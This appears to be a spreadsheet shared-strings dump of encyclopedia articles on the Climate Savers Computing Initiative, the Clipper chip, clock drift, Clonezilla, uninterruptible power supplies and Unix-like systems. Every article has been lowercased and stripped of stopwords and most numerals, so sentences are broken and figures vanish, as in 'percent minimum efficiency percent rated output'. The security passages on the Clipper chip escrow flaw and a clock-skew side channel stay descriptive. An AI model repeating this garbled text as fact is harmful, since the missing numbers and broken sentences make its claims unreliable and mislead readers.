    <t>climate savers computing initiative nonprofit group consumers, businesses conservation organizations dedicated promoting smart technologies improve power efficiency reduce energy consumption computers. formed 2007, based portland, oregon. july 2012, climate savers computing initiative combined green grid programs continue within organization. participating manufacturers committed producing products meet specified power-efficiency targets, members committed purchasing power-efficient computing products. 2010, initiative sought reduce energy consumption computers percent reduce global emissions operation computers million tons year. goal goal environmental effort save energy reduce greenhouse emissions setting targets energy-efficient computers components, promoting adoption energy-efficient computers power management tools globally. typical desktop wastes half power draws power outlet. servers typically waste 30-40% power consume. this energy wasted heat. result, offices, homes, data centers increased demands conditioning turn increases energy requirements associated costs. increasing effectiveness power-management features computers well implementing features aggressive power-management policies, average business desktop save electricity consumed, compromise productivity. these results combat climate change costs. with individual member company participation, effort worked toward reduction power consumption computers 2010, committed participants aimed collectively save $5.5 billion energy costs million tons emissions year. that would equivalent taking million cars road every year. participants climate savers computing initiative represented demand supply side computer industry, including computer manufacturers chip makers, well environmental groups, energy companies, retailers, government agencies more. supporters initiative included intel corporation, google, dell, eds, united states environmental protection agency (epa), hewlett-packard, lenovo, microsoft, pacific electric company (pg&amp;e), world wildlife fund others. specifications climate savers computing initiative operated manner similar u.s. government's energy star program. intended promote deployment existing technologies investment energy-efficiency technologies. energy star standard desktops, laptops, workstations, took effect july 2007, requires power supplies least percent efficient load range. addition, puts limits energy used devices inactive requires systems shipped power management features enabled. initiative started 2007 energy star requirements desktops, laptops workstations (including monitors), gradually increased efficiency requirements next four years, follows: from july 2007 june 2008, must energy star requirements. this means percent minimum efficiency power supply unit (psu) percent, percent, percent rated output, power factor least percent rated output, meeting maximum power requirements standby, sleep, idle modes. from july 2008 june 2009 standard increased percent minimum efficiency percent rated output (and percent minimum efficiency percent percent rated output). equivalent plus bronze level. from july 2009 june 2010, standard increased percent minimum efficiency percent rated output (and percent minimum efficiency percent percent rated output). equivalent plus silver level. from july 2010 june 2011, standard increased percent minimum efficiency percent rated output (and percent minimum efficiency percent percent rated output). equivalent plus gold level. servers addition, initiative following high-efficiency targets volume servers (1u/2u single- dual-socket servers): from july 2007 june 2008, volume servers must percent minimum efficiency power supply unit (psu) percent rated output (and percent minimum efficiency percent percent rated output), power factor least percent rated output. from july 2008 june 2009 standard increased percent minimum efficiency percent rated output (and percent minimum efficiency percent percent rated output). from july 2009 june 2010, standard increased percent minimum efficiency percent rated output (and percent minimum efficiency percent percent rated output. relationship green grid july 2012 climate savers computing initiative green grid announced joining organizations resulting climate savers computing initiative's programs membership moved green grid brand build tgg's success improving resource efficiency information technology data centers. csci fused separate closely aligned resources together accelerate implementation energy efficiency sustainability within communications industries. also plus energy star green computing power management references external links climate savers computing initiative website</t>
  </si>
  <si>
    <t>Clipper chip</t>
  </si>
  <si>
    <t>clipper chip chipset developed promoted united states national security agency (nsa) encryption device secured "voice data messages" built-in backdoor intended "allow federal, state, local enforcement officials ability decode intercepted voice data transmissions." intended adopted telecommunications companies voice transmission. introduced 1993, entirely defunct 1996. escrow clipper chip used data encryption algorithm called skipjack transmit information diffie–hellman exchange-algorithm distribute cryptokeys peers. skipjack invented national security agency u.s. government; algorithm initially classified secret, prevented subjected peer review encryption research community. government state used 80-bit key, algorithm symmetric, similar algorithm. skipjack algorithm declassified published june 1998. initial cost chips said (unprogrammed) (programmed), logic designed mykotronx, fabricated vlsi technology, inc. heart concept escrow. factory, telephone device clipper chip would given cryptographic key, would provided government escrow. government agencies "established authority" listen communication, would given government agencies, could decrypt data transmitted particular telephone. newly formed electronic frontier foundation preferred term "key surrender" emphasize alleged really occurring. clinton administration clinton administration argued clipper chip essential enforcement keep constantly progressing technology united states. while many believed device would additional terrorists receive information, clinton administration said would actually increase national security. they argued "terrorists would communicate outsiders banks, suppliers, contacts government could listen calls." other proponents there several advocates clipper chip argued technology safe implement effective intended purpose providing enforcement ability intercept communications necessary warrant howard dakoff, writing john marshall review, stated technology secure legal rationale implementation sound. stewart baker wrote opinion piece wired magazine debunking series purported myths surrounding technology. backlash organizations electronic privacy information center electronic frontier foundation challenged clipper chip proposal, saying would effect subjecting citizens increased possibly illegal government surveillance, strength clipper chip's encryption could evaluated public design classified secret, therefore individuals businesses might hobbled insecure communications system. further, pointed american companies could forced clipper chip encryption products, foreign companies could not, presumably phones strong data encryption would manufactured abroad spread throughout world united states, negating point whole exercise, and, course, materially damaging u.s. manufacturers route. senators john ashcroft john kerry opponents clipper chip proposal, arguing favor individual's right encrypt messages export encryption software.the release development several strong cryptographic software packages nautilus, pgpfone response government push clipper chip. thinking strong cryptography freely available internet alternative, government would unable stop use. technical vulnerabilities 1994, matt blaze published paper protocol failure escrowed encryption standard. pointed clipper's escrow system serious vulnerability: chip transmitted 128-bit "law enforcement access field" (leaf) contained information necessary recover encryption key. prevent software transmitted message tampering leaf, 16-bit hash included. clipper chip would decode messages invalid hash; however, 16-bit hash short provide meaningful security. brute-force attack would quickly produce another leaf value would give hash yield correct keys escrow attempt. this would allow clipper chip used encryption device, disabling escrow capability.: 1995 yair frankel moti yung published another attack inherent design shows escrow device tracking authenticating capability (namely, leaf) device, attached messages coming another device nevertheless received, thus bypassing escrow real time. 1997, group leading cryptographers published paper, "the risks recovery, escrow, trusted third-party encryption", analyzing architectural vulnerabilities implementing escrow systems general, including limited clipper chip skipjack protocol. technical flaws described paper instrumental demise clipper chip public policy option. while many leading voices computer science community expressed opposition clipper chip recovery general, supported concept, including dorothy denning. lack adoption clipper chip embraced consumers manufacturers chip longer relevant 1996; significant purchaser phones chip united states department justice. u.s. government continued press escrow offering incentives manufacturers, allowing relaxed export controls escrow part cryptographic software exported. these attempts largely made moot widespread strong cryptographic technologies, pgp, control u.s. government. however, strongly encrypted voice channels still predominant mode current cell phone communications. secure cell phone devices smartphone apps exist, require specialized hardware, typically require ends connection employ encryption mechanism. such apps usually communicate secure internet pathways (e.g. zrtp) instead phone voice data networks. later debates following snowden disclosures 2013, apple google stated would lock data stored smartphones encryption, apple google could break encryption even ordered warrant. this prompted strong reaction authorities, including chief detectives chicago's police department stating "apple['s iphone] become phone choice pedophile". editorial washington post argued "smartphone users must accept cannot valid search warrant", claiming agree backdoors would undesirable, suggested implementing "golden key" backdoor would unlock data warrant. members "the risks recovery, escrow, trusted third-party encryption" 1997 paper, well researchers mit, wrote follow-up article response revival debate, arguing mandated government access private conversations would even worse problem twenty years ago. also bullrun (decryption program) cryptoprocessor crypto: code rebels beat government—saving privacy digital steven levy trusted platform module hardware backdoor references external links clipper chip clipper chip white house statement evolution government restrictions using exporting encryption technologies (u), michael schwartzbeck, encryption technologies, circa 1997, formerly secret, approved release redactions september 2014, c06122418 oral history interview martin hellman oral history interview 2004, palo alto, california. charles babbage institute, university minnesota, minneapolis. hellman describes invention public cryptography collaborators whitfield diffie ralph merkle stanford university mid-1970s. also relates subsequent work cryptography steve pohlig (the pohlig-hellman system) others. hellman addresses escrow (the so-called clipper chip). also touches commercialization cryptography data security verisign.</t>
  </si>
  <si>
    <t>Clock drift</t>
  </si>
  <si>
    <t>clock drift refers several related phenomena clock exactly rate reference clock. that time clock "drifts apart" gradually desynchronizes clock. clocks subject drift, causing eventual divergence unless resynchronized. particular, drift crystal-based clocks used computers requires synchronization mechanism high-speed communication. computer clock drift utilized build random number generators. these however exploited timing attacks. non-atomic clocks everyday clocks wristwatches finite precision. eventually require correction remain accurate. rate drift depends clock's quality, sometimes stability power source, ambient temperature, subtle environmental variables. thus clock different drift rates different occasions. more advanced clocks mechanical clocks often kind speed trimmer adjust speed clock thus correct clock drift. instance, pendulum clocks clock drift manipulated slightly changing length pendulum. quartz oscillator less subject drift manufacturing variances pendulum mechanical clock. hence everyday quartz clocks adjustable drift correction. atomic clocks atomic clocks precise nearly clock drift. even earth's rotation rate drift variation drift atomic clock tidal acceleration effects. principle behind atomic clock enabled scientists re-define unit second terms exactly 9192631770 oscillations caesium-133 atom. precision oscillations allows atomic clocks drift roughly second hundred million years; 2015, accurate atomic clock loses second every billion years. international atomic time (tai) time standard derivatives (such coordinated universal time (utc)) based weighted averages atomic clocks worldwide. relativity einstein predicted, relativistic effects also cause clock drift time dilation. this fixed universal time, time relative observer. special relativity describes clocks held observers different inertial frames (i.e. moving respect accelerating decelerating) appear either observer tick different rates. addition this, general relativity gives gravitational time dilation. briefly, clock stronger gravitational field (e.g. closer planet) appear tick slowly. people holding clocks (i.e. inside outside stronger field) would agree clocks appear going faster. time rather function clock affected. both effects experimentally observed.time dilation practical importance. instance, clocks satellites experience effect reduced gravity experience (making clocks appear quickly earth) must therefore incorporate relativistically corrected calculations reporting locations users. general relativity accounted for, navigational based satellites would false minutes, errors global positions would continue accumulate rate kilometers day. random number generators computer programs often need high quality random numbers, especially cryptography. there several similar ways clock drift used build random number generators (rngs). build hardware random number generator independent clock crystals, instance ticks times second ticks million times second. average faster crystal tick 10,000 times time slower ticks. since clock crystals precise, exact number ticks vary. that variation used create random bits. instance, number fast ticks even, chosen, number ticks odd, chosen. thus 100/1000000 circuit produce somewhat random bits second. typically system biased—it might instance produce zeros ones—and hundreds somewhat-random bits "whitened" produce unbiased bits. there also similar build kind "software random number generator". this involves comparing timer tick operating system (the tick usually 100–1000 times second) speed cpu. timer independent clock crystals situation ideal less previous example. even clock crystal process/program clock drift measurement "disturbed" many less unpredictable events interrupts processes programs time. thus measurement still produce fairly good random numbers. most hardware random number generators ones described fairly slow. therefore, programs create good seed feed pseudorandom number generator cryptographically secure pseudorandom number generator produce many random numbers fast. timing attack 2006, side channel attack published exploited clock skew based heating. attacker causes heavy load pseudonymous server (tor hidden service), causing heating. heating correlated clock skew, detected observing timestamps (under server's real identity). also slip clock skew effects relativity injection locking segal's references</t>
  </si>
  <si>
    <t>Clonezilla</t>
  </si>
  <si>
    <t>clonezilla suite open source drive cloning, drive imaging system deployment utilities used simplify deployment maintenance group computers. clonezilla server edition uses multicast technologies deploy single image file group computers local area network. clonezilla designed steven shiau developed nchc free software labs taiwan.clonezilla used deploy operating systems computers imaging single computer deploying image systems. integrates several open-source programs provide cloning imaging capabilities. variants clonezilla works copying used blocks storage device (i.e. sata ssd, nvme ssd). intended support bare-metal deployment operating systems booting preinstalled live environment. preinstallation environment booted flash drive, cd/dvd-rom android mobile phone. uses partclone, ntfsclone partimage image drive either network locally-attached hard disk drive.there variants clonezilla: clonezilla live intended used imaging single computer, clonezilla server edition (se) intended mass deployment computer network. clonezilla live clonezilla live image single computer's storage media single partition media image file stored server, samba network share, locally-attached hard disk drive network filesystem file-share. alternatively, clonezilla live clone data storage medium another without need create image file first. image files deployed different computers required. unlike acronis cyber protect home office norton ghost, clonezilla lacks agent installed operating system. instead, clonezilla designed assumption disk cloned without interfering operating system. booted preinstallation environment operations performed within consistent environment. clonezilla server edition (se) clonezilla server edition (se) clone many computers time using multicast technology computer network. multicast support provided udpcast tool.since environment difficult configure, users download live disk provides operating system necessary configurations already done. images uploaded image repository configured user, local directory server clonezilla remote location network-attached storage accessed using samba. effectiveness clonezilla effective tool deploying software training laboratories. clonezilla sometimes faster proprietary solutions (i.e. norton ghost, driveimage xml, macrium reflect, active disk image) full image backup restoration difficult configure. clonezilla lacks incremental differential backup support (which make deployment slower). features filesystem copying clonezilla uses information filesystem determine blocks drive require copying. this ensures space currently drive copied empty space ignored. clonezilla supports several filesystems including: linux-based filesystems (ext2, ext3, ext4, reiserfs, xfs, btrfs); windows (ntfs fat); lvm2 hardware raid chip sets. when unsupported filesystem imaged cloned, clonezilla falls back copying data using master boot record drive metadata copied using clonezilla using partclone, partimage ntfsclone copy appropriate filesystem. compression clonezilla images split smaller files compressed save space destination drive. booting clonezilla booted computer network using booting techniques. also redo rescue, formerly redo backup recovery, free backup disaster recovery software partly based clonezilla. references external links official website clonezilla distrowatch rescuezilla open-source disk imaging graphical user interface fully compatible clonezilla.</t>
  </si>
  <si>
    <t>Uninterruptible power supply</t>
  </si>
  <si>
    <t>uninterruptible power supply uninterruptible power source (ups) electrical apparatus provides emergency power load input power source mains power fails. differs auxiliary emergency power system standby generator provide near-instantaneous protection input power interruptions, supplying energy stored batteries, supercapacitors, flywheels. on-battery run-time uninterruptible power sources relatively short (only minutes) sufficient start standby power source properly shut protected equipment. type continual power system. typically used protect hardware computers, data centers, telecommunication equipment electrical equipment unexpected power disruption could cause injuries, fatalities, serious business disruption data loss. units range size ones designed protect single computer without video monitor (around volt-ampere rating) large units powering entire data centers buildings. world's largest ups, 46-megawatt battery energy storage system (bess), fairbanks, alaska, powers entire city nearby rural communities outages. common power problems primary role provide short-term power input power source fails. however, units also capable varying degrees correcting common utility power problems: voltage spike sustained overvoltage momentary sustained reduction input voltage voltage noise, defined high frequency transient oscillation, usually injected line nearby equipment instability mains frequency harmonic distortion, defined departure ideal sinusoidal waveform expected linesome manufacturers units categorize products accordance number power-related problems address.a unit also introduce problems electric power quality. prevent this, selected capacity, also quality power required equipment supplied. technologies three general categories modern systems on-line, line-interactive standby: on-line uses "double conversion" method accepting input, rectifying passing rechargeable battery battery strings), inverting back v/230 powering protected equipment. line-interactive maintains inverter line redirects battery's current path normal charging mode supplying current power lost. standby ("off-line") system load powered directly input power backup power circuitry invoked utility power fails.most kilovolt-ampere kva) line-interactive standby variety usually less expensive. large power units, dynamic uninterruptible power supplies (dups) sometimes used. synchronous motor/alternator connected mains choke. energy stored flywheel. when mains power fails, eddy-current regulation maintains power load long flywheel's energy exhausted. dups sometimes combined integrated diesel generator turned brief delay, forming diesel rotary uninterruptible power supply (drups). fuel cell developed company hydrogenics using hydrogen fuel cell power source, potentially providing long times small space. offline/standby offline/standby offers basic features, providing surge protection battery backup. protected equipment normally connected directly incoming utility power. when incoming voltage falls rises predetermined level turns internal dc-ac inverter circuitry, powered internal storage battery. mechanically switches connected equipment dc-ac inverter output. switch-over time long milliseconds depending amount time takes standby detect lost utility voltage. designed power certain equipment, personal computer, without objectionable brownout device. line-interactive line-interactive similar operation standby ups, addition multi-tap variable-voltage autotransformer. this special type transformer subtract powered coils wire, thereby increasing decreasing magnetic field output voltage transformer. this also performed buck–boost transformer distinct autotransformer, since former wired provide galvanic isolation. this type able tolerate continuous undervoltage brownouts overvoltage surges without consuming limited reserve battery power. instead compensates automatically selecting different power taps autotransformer. depending design, changing autotransformer cause brief output power disruption, cause upss equipped power-loss alarm "chirp" moment. this become popular even cheapest upses takes advantage components already included. main 50/60 transformer used convert line voltage battery voltage needs provide slightly different turns ratios: convert battery output voltage (typically multiple line voltage, second convert line voltage slightly higher battery charging voltage (such multiple difference voltages charging battery requires delta voltage 13–14 charging battery). furthermore, easier switching line-voltage side transformer lower currents side. gain buck/boost feature, required separate switches input connected primary taps, load connected other, thus using main transformer's primary windings autotransformer. battery still charged "bucking" overvoltage, "boosting" undervoltage, transformer output charge batteries. autotransformers engineered cover wide range varying input voltages, requires taps increases complexity, well expense ups. common autotransformer cover range power, switch battery voltage goes much higher lower range. low-voltage conditions current normal, need higher current circuit normal device. example, power 1000-w device draw 8.33 brownout occurs voltage drops draw compensate. this also works reverse, overvoltage condition, need less current. online/double-conversion online ups, batteries always connected inverter, power transfer switches necessary. when power loss occurs, rectifier simply drops circuit batteries keep power steady unchanged. when power restored, rectifier resumes carrying load begins charging batteries, though charging current limited prevent high-power rectifier damaging batteries. main advantage online ability provide "electrical firewall" incoming utility power sensitive electronic equipment. online ideal environments electrical isolation necessary equipment sensitive power fluctuations. although time reserved large installations more, advances technology permitted available common consumer device, supplying less. online necessary power environment "noisy", utility power sags, outages anomalies frequent, protection sensitive equipment loads required, operation extended-run backup generator necessary. basic technology online standby line-interactive ups. however typically costs much more, much greater current ac-to-dc battery-charger/rectifier, rectifier inverter designed continuously improved cooling systems. called double-conversion rectifier directly driving inverter, even powered normal current. online typically static transfer switch (sts) increasing reliability. other designs hybrid topology/double conversion demand these hybrid rotary designs official designations, although name used "double conversion demand". this style targeted towards high-efficiency applications still maintaining features protection level offered double conversion. hybrid (double conversion demand) operates off-line/standby power conditions within certain preset window. this allows achieve high efficiency ratings. when power conditions fluctuate outside predefined windows, switches online/double-conversion operation. double-conversion mode adjust voltage variations without battery power, filter line noise control frequency. ferroresonant ferroresonant units operate standby unit; however, online exception ferroresonant transformer, used filter output. this transformer designed hold energy long enough cover time switching line power battery power effectively eliminates transfer time. many ferroresonant upss 82–88% efficient (ac/dc-ac) offer excellent isolation. transformer three windings, ordinary mains power, second rectified battery power, third output power load. this dominant type limited around range. these units still mainly used industrial settings (oil gas, petrochemical, chemical, utility, heavy industry markets) robust nature ups. many ferroresonant upss utilizing controlled ferro technology interact power-factor-correcting equipment. this result fluctuating output voltage ups, corrected reducing load levels, adding linear type loads. power designed powering equipment similar online ups, except need output inverter. also, ups's battery voltage matched voltage device needs, device's power supply needed either. since power conversion steps eliminated, increases efficiency time. many systems used telecommunications extra-low voltage "common battery" power, less restrictive safety regulations, installed conduit junction boxes. typically dominant power source telecommunications, typically dominant source computers servers. there much experimentation power computer servers, hope reducing likelihood failure cost equipment. however, supply amount power, current would higher equivalent circuit; greater current requires larger conductors, energy lost heat. high voltage (380 finding data center applications, allows small power conductors, subject complex electrical code rules safe containment high voltages.for lower power devices portable battery banks work ups. rotary rotary uses inertia high-mass spinning flywheel (flywheel energy storage) provide short-term ride-through event power loss. flywheel also acts buffer power spikes sags, since short-term power events able appreciably affect rotational speed high-mass flywheel. also oldest designs, predating vacuum tubes integrated circuits. considered line since spins continuously normal conditions. however, unlike battery-based ups, flywheel-based systems typically provide seconds protection flywheel slowed power output stops. traditionally used conjunction standby generators, providing backup power brief period time engine needs start running stabilize output. rotary generally reserved applications needing 10,000 protection, justify expense benefit advantages rotary systems bring. larger flywheel multiple flywheels operating parallel increase reserve running time capacity. because flywheels mechanical power source, necessary electric motor generator intermediary diesel engine designed provide emergency power. using transmission gearbox, rotational inertia flywheel used directly start diesel engine, running, diesel engine used directly spin flywheel. multiple flywheels likewise connected parallel mechanical countershafts, without need separate motors generators flywheel. they normally designed provide high current output compared purely electronic ups, better able provide inrush current inductive loads motor startup compressor loads, well medical cath equipment. also able tolerate short-circuit conditions times larger electronic ups, permitting device blow fuse fail devices still continue powered rotary ups. life cycle usually greater purely electronic ups, years more. require periodic downtime mechanical maintenance, ball bearing replacement. larger systems redundancy system ensures availability processes maintenance. battery-based designs require downtime batteries hot-swapped, usually case larger units. newer rotary units technologies magnetic bearings air-evacuated enclosures increase standby efficiency reduce maintenance levels. typically, high-mass flywheel used conjunction motor-generator system. these units configured motor driving mechanically connected generator, combined synchronous motor generator wound alternating slots single rotor stator, hybrid rotary ups, designed similar online ups, except uses flywheel place batteries. rectifier drives motor spin flywheel, generator uses flywheel power inverter.in case motor generator synchronous/synchronous induction/synchronous. motor side unit case nos. driven directly power source (typically inverter bypass), 6-step double-conversion motor drive, 6-pulse inverter. case uses integrated flywheel short-term energy source instead batteries allow time external, electrically coupled gensets start brought online. case nos. batteries free-standing electrically coupled flywheel short-term energy source. form factors smaller systems come several different forms sizes. however, common forms tower rack-mount.tower models stand upright ground desk shelf, typically used network workstations desktop computer applications. rack-mount models mounted standard 19-inch rack enclosures require anywhere (rack units). they typically used server networking applications. some devices feature user interfaces rotate 90°, allowing devices mounted vertically ground horizontally would found rack. applications large business environments reliability great importance, single huge also single point failure disrupt many systems. provide greater reliability, multiple smaller modules batteries integrated together provide redundant power protection equivalent large ups. means load supplied modules, installation contain modules. way, failure module impact system operation. multiple redundancy many computer servers offer option redundant power supplies, event power supply failing, power supplies able power load. this critical point power supply must able power entire server itself. redundancy enhanced plugging power supply different circuit (i.e. different circuit breaker). redundant protection extended connecting power supply ups. this provides double protection power supply failure failure, continued operation assured. this configuration also referred redundancy. budget allow identical units common practice plug power supply mains power ups. outdoor when system placed outdoors, specific features guarantee tolerate weather without effects performance. factors temperature, humidity, rain, snow among others considered manufacturer designing outdoor system. operating temperature ranges outdoor systems could around °c.outdoor systems either pole, ground (pedestal), host mounted. outdoor environment could mean extreme cold, case outdoor system include battery heater mat, extreme heat, case outdoor system include system conditioning system. solar inverter, inverter, solar converter, converts variable direct current (dc) output photovoltaic (pv) solar panel utility frequency alternating current (ac) commercial electrical grid used local, off-grid electrical network. critical bos–component photovoltaic system, allowing ordinary ac-powered equipment. solar inverters special functions adapted photovoltaic arrays, including maximum power point tracking anti-islanding protection. harmonic distortion output electronic upses significant departure ideal sinusoidal waveform. this especially true inexpensive consumer-grade single-phase units designed home office use. these often utilize simple switching power supplies output resembles square wave rich harmonics. these harmonics cause interference electronic devices including radio communication devices (e.g. inductive loads motors) perform reduced efficiency all. more sophisticated (and expensive) units produce nearly pure sinusoidal power. power factor problem combination double-conversion generator voltage distortion created ups. input double-conversion essentially rectifier. current drawn non-sinusoidal. this cause voltage mains generator also become non-sinusoidal. voltage distortion cause problems electrical equipment connected power source, including itself. also cause power lost wiring supplying power spikes current flow. this level "noise" measured percentage "total harmonic distortion current" (thdi). classic rectifiers thdi level around 25%–30%. reduce voltage distortion, requires heavier mains wiring generators twice large ups. there several solutions reduce thdi double-conversion ups: classic solutions passive filters reduce thdi 5%–10% full load. they reliable, work full load, present problems used tandem generators. alternative solution active filter. through device, thdi drop full power range. newest technology double-conversion units rectifier classic rectifier components (thyristors diodes) uses high-frequency components instead. double-conversion insulated-gate bipolar transistor rectifier inductor thdi small this completely eliminates need oversize generator (and transformers), without additional filters, investment cost, losses, space. communication power management (pm) requires: report status computer powers communications link serial port, ethernet simple network management protocol, gsm/gprs subsystem processes reports generates notifications, events, commands ordered shut down. some manufacturers publish communication protocols, manufacturers (such apc) proprietary protocols.the basic computer-to-ups control methods intended one-to-one signaling single source single target. example, single connect single computer provide status information ups, allow computer control ups. similarly, protocol also intended connect single computer multiple peripheral devices. situations useful single large able communicate several protected devices. traditional serial control, signal replication device used, example allows connect five computers using serial connections. however, splitting typically direction devices provide status information. return control signals permitted protected systems ups.as ethernet increased common since 1990s, control signals commonly sent single multiple computers using standard ethernet data communication methods tcp/ip. status control information typically encrypted that, example, outside hacker gain control command shut down.distribution status control data requires intermediary devices ethernet switches serial multiplexers powered systems, order alerts reach target systems power outage. avoid dependency ethernet infrastructure, upss connected directly main control server using gsm/gprs channel also. gprs data packets sent upss trigger software shut reduce load. batteries there three main types batteries: valve regulated lead acid (vrla), flooded cell batteries, lithium batteries. run-time battery-operated depends type size batteries rate discharge, efficiency inverter. total capacity lead–acid battery function rate discharged, described peukert's law. manufacturers supply run-time rating minutes packaged systems. larger systems (such data centers) require detailed calculation load, inverter efficiency, battery characteristics ensure required endurance attained. common battery characteristics load testing when lead–acid battery charged discharged, initially affects reacting chemicals, interface electrodes electrolyte. with time, charge stored chemicals interface, often called "interface charge", spreads diffusion chemicals throughout volume active material. battery completely discharged (e.g. lights left overnight) next given fast charge minutes, short charging time develops charge near interface. battery voltage rise close charger voltage charging current decreases significantly. after hours interface charge spread volume electrode electrolyte, leading interface charge insufficient start car.due interface charge, brief self-test functions lasting seconds accurately reflect true runtime capacity ups, instead extended recalibration rundown test deeply discharges battery needed.the deep discharge testing damaging batteries chemicals discharged battery starting crystallize highly stable molecular shapes re-dissolve battery recharged, permanently reducing charge capacity. lead acid batteries known sulfation also affects types nickel cadmium batteries lithium batteries. therefore, commonly recommended rundown tests performed infrequently, every months year. testing strings batteries/cells multi-kilowatt commercial systems large easily accessible battery banks capable isolating testing individual cells within battery string, consists either combined-cell battery units (such 12-v lead acid batteries) individual chemical cells wired series. isolating single cell installing jumper place allows battery discharge-tested, rest battery string remains charged available provide protection.it also possible measure electrical characteristics individual cells battery string, using intermediate sensor wires installed every cell-to-cell junction, monitored individually collectively. battery strings also wired series-parallel, example sets cells. situation also necessary monitor current flow parallel strings, current circulate strings balance effects weak cells, dead cells high resistance, shorted cells. example, stronger strings discharge weaker strings voltage imbalances equalized, must factored individual inter-cell measurements within string. series-parallel battery interactions battery strings wired series-parallel develop unusual failure modes interactions multiple parallel strings. defective batteries string adversely affect operation lifespan good batteries strings. these issues also apply situations series-parallel strings used, systems also electric vehicle applications.consider series-parallel battery arrangement good cells, becomes shorted dead: failed cell reduce maximum developed voltage entire series string within. other series strings wired parallel degraded string discharge degraded string voltage matches voltage degraded string, potentially overcharging leading electrolyte boiling outgassing remaining good cells degraded string. these parallel strings never fully recharged, increased voltage bleed string containing failed battery. charging systems attempt gauge battery string capacity measuring overall voltage. overall string voltage depletion dead cells, charging system detect state discharge, continuously attempt charge series-parallel strings, leads continuous overcharging damage cells degraded series string containing damaged battery. lead-acid batteries used, cells formerly good parallel strings begin sulfate inability fully recharged, resulting storage capacity cells permanently damaged, even damaged cell degraded string eventually discovered replaced one.the prevent subtle series-parallel string interactions using parallel strings using separate charge controllers inverters individual series strings. series new/old battery interactions even single string batteries wired series adverse interactions batteries mixed batteries. older batteries tend reduced storage capacity, discharge faster batteries also charge maximum capacity rapidly batteries. mixed string batteries depleted, string voltage drop, batteries exhausted batteries still charge available. newer cells continue discharge rest string, voltage energy flow useful, wasted cells resistance heating. cells supposed operate within specific discharge window, cells capacity cause cells series string continue discharge beyond safe bottom limit discharge window, damaging cells. when recharged, cells recharge rapidly, leading rapid rise voltage near fully charged state, cells capacity fully recharged. charge controller detects high voltage nearly fully charged string reduces current flow. cells capacity charge slowly, slowly chemicals begin crystallize reaching fully charged state, reducing cell capacity several charge/discharge cycles capacity closely matches cells series string. reasons, industrial management systems recommend periodic replacement entire battery arrays potentially using hundreds expensive batteries, damaging interactions batteries batteries, within across series parallel strings. standards 62040-1:2008 uninterruptible power systems (ups) part general safety requirements 62040-2:2006 uninterruptible power systems (ups) part electromagnetic compatibility (emc) requirements 62040-3:2011 uninterruptible power systems (ups) part method specifying performance test requirements 62040-4:2013 uninterruptible power systems (ups) part environmental aspects requirements reporting also battery room emergency power system fuel cell applications baseline protection power conditioner dynamic voltage restoration metering system energy storage surge protector switched-mode power supply (smps) switched-mode power supply applications emergency light references external links scott siddens (february 2007), front line, plant engineering, archived original 2009-11-09 cottuli, carol (2011), comparison static rotary (pdf), schneider electric, white paper rev. retrieved april 2012 rasmussen, neil (2011), different types systems (pdf), schneider electric, white paper rev. retrieved april 2012 vandee, dawn (march 1999), "rounding rotary features", ec&amp;m, penton business media, retrieved april 2012 "ups basics". eaton corporation. 2012. retrieved 2014-01-08. {{cite journal}}: cite journal requires |journal= (help) different type systems available, archived original 2015-05-30</t>
  </si>
  <si>
    <t>Unix-like</t>
  </si>
  <si>
    <t>unix-like (sometimes referred un*x *nix) operating system behaves manner similar unix system, although necessarily conforming certified version single unix specification. unix-like application behaves like corresponding unix command shell. there technical standard defining term, opinions differ whether degree particular operating system application unix-like. term include free open-source operating systems inspired bell labs' unix designed emulate features, commercial proprietary workalikes, versions based licensed unix source code, sufficiently unix-like pass certification bear unix trademark. definition open group owns unix trademark administers single unix specification, "unix" name used certification mark. they approve construction "unix-like", consider misuse trademark. their guidelines require "unix" presented uppercase otherwise distinguished surrounding text, strongly encourage using branding adjective generic word "system", discourage hyphenated phrases.other parties frequently treat "unix" genericized trademark. some wildcard character name make abbreviation like "un*x" "*nix", since unix-like systems often unix-like names aix, a/ux, hp-ux, irix, linux, minix, ultrix, xenix, xnu. these patterns literally match many system names, still generally recognized refer unix system, descendant, work-alike, even completely dissimilar names darwin/macos, illumos/solaris freebsd. 2007, wayne gray sued dispute status unix trademark, lost case, lost appeal, court upholding trademark ownership. history "unix-like" systems started appear late 1970s early 1980s. many proprietary versions, idris (1978), unos (1982), coherent (1983), uniflex (1985), aimed provide businesses functionality available academic users unix. when at&amp;t allowed relatively inexpensive commercial binary sub-licensing unix 1979, variety proprietary systems developed based including aix, hp-ux, irix, sunos, tru64, ultrix, xenix. these largely displaced proprietary clones. growing incompatibility among systems creation interoperability standards, including posix single unix specification. various free, low-cost, unrestricted substitutes unix emerged 1980s 1990s, including 4.4bsd, linux, minix. some turn basis commercial "unix-like" systems, bsd/os macos. several versions (mac) x/macos running intel-based computers certified single unix specification. variants descendants unix developed university california berkeley unix source code bell labs. however, code base evolved since then, replacing at&amp;t code. since variants certified compliant single unix specification, referred "unix-like" rather "unix". categories dennis ritchie, original creators unix, expressed opinion unix-like systems linux facto unix systems. eric raymond landley suggested three kinds unix-like systems: genetic unix those systems historical connection at&amp;t codebase. most commercial unix systems fall category. systems, descendants work done university california, berkeley late 1970s early 1980s. some systems original at&amp;t code still trace ancestry at&amp;t designs. trademark branded unix these systems‍—‌largely commercial nature‍—‌have determined open group meet single unix specification allowed carry unix name. most systems commercial derivatives system code base form another, although apple macos 10.5 later variant certified, euleros inspur k-ux linux distributions certified, systems (such z/os) earned trademark posix compatibility layer otherwise inherently unix systems. many ancient unix systems longer meet definition. functional unix broadly, unix-like system behaves manner roughly consistent unix specification, including "program manages login command line sessions"; specifically, refer systems linux minix behave similarly unix system genetic trademark connection at&amp;t code base. most free/open-source implementations unix design, whether genetic unix not, fall restricted definition third category expense obtaining open group certification, costs thousands dollars.around 2001, linux given opportunity certification including free help posix chair andrew josey symbolic price dollar. there activities make linux posix-compliant, josey prepared list differences posix standard linux standard base specification, august 2005, project shut missing interest work group. compatibility layers some non-unix-like operating systems provide unix-like compatibility layer, varying degrees unix-like functionality. z/os's unix system services sufficiently complete certified trademark unix. cygwin, msys, msys2 provide environment microsoft windows user api, sufficient common open source software compiled run. toolkit uwin comprehensive interoperability tools allow porting unix programs windows. windows nt-type systems posix environmental subsystem. subsystem unix-based applications (previously interix) provides unix-like functionality windows subsystem (discontinued). windows subsystem linux provides linux-compatible kernel interface developed microsoft containing linux code, ubuntu user-mode binaries running it.other means windows-unix interoperability include: windows packages used various servers windows hummingbird connectivity provides several ways windows machines connect unix linux machines, terminal emulators clients servers, others windows resource kits versions windows include bourne shell, command-line tools, version perl hamilton shell version written specifically windows. also list unix-like systems berkeley software distribution linux kernel linux distribution list linux distributions list unix commands list 